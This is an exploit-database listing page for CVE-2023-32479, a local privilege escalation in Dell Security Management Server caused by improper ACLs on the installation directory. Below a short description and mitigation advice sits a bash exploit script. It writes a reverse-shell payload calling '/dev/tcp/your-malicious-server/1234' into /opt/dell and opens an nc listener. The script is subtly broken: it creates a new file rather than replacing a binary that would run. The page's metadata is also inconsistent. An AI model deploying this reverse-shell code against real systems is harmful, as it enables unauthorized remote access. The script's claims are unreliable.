header-logo
Suggest Exploit
vendor:
Dell Security Management Server
by:
Amirhossein Bahramizadeh
6.1
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name: Dell Security Management Server
Affected Version From: Prior to 11.9.0
Affected Version To: 11.8.9 and below
Patch Exists: NO
Related CWE: CVE-2023-32479
CPE: a:dell:security_management_server
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

Dell Security Management Server Privilege Escalation

Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 are vulnerable to privilege escalation. This is due to improper ACLs of the non-default installation directory. An attacker with local access could exploit this by replacing binaries in the installation directory, allowing them to execute arbitrary commands and potentially gain elevated privileges on the system.

Mitigation:

To mitigate this vulnerability, ensure proper file system permissions are set on the installation directory. Regularly monitor the integrity of installed binaries for any unauthorized changes.
Source

Exploit-DB raw data:

# Exploit Title: [title] Dell Security Management Server versions prior to
11.9.0
# Exploit Author: [author] Amirhossein Bahramizadeh
# CVE : [if applicable] CVE-2023-32479
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
Management
Server versions prior to 11.9.0 contain privilege escalation vulnerability
due to improper ACL of the non-default installation directory. A local
malicious user could potentially exploit this vulnerability by replacing
binaries in installed directory and taking the reverse shell of the system
leading to Privilege Escalation.

#!/bin/bash

INSTALL_DIR="/opt/dell"

# Check if the installed directory has improper ACLs
if [ -w "$INSTALL_DIR" ]; then
    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell
    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
    chmod +x "$INSTALL_DIR/dell-exploit"

    # Wait for the reverse shell to connect to your malicious server
    nc -lvnp 1234
fi

Navigation

Suggest Exploit

Services By CQR